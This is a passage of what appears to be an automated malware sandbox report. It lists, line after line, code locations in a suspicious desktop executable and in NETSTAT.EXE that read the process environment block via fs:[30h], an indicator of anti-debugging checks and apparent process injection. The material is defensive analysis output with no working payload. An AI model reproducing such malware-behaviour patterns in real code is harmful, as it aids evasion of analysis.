          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01195210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01195210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01195210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01195210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0124B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0124B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01268A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01199240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01199240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01199240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01199240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01224257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01268D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0121A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01213540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01243D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01192D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01192D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01192D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01192D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01192D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01248DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0126740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0126740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0126740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01216CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01268CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0126070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0126070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01194F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01194F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01268F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01217794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01217794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01217794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0124FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01251608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0119E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0125AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01260EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01260EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01260EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_012146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0122FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_0124FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_01268ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\8sxgohtHjM.exeCode function: 4_2_011C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03BE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 16_2_03B152A5 mov eax, dword ptr fs:[00000030h]
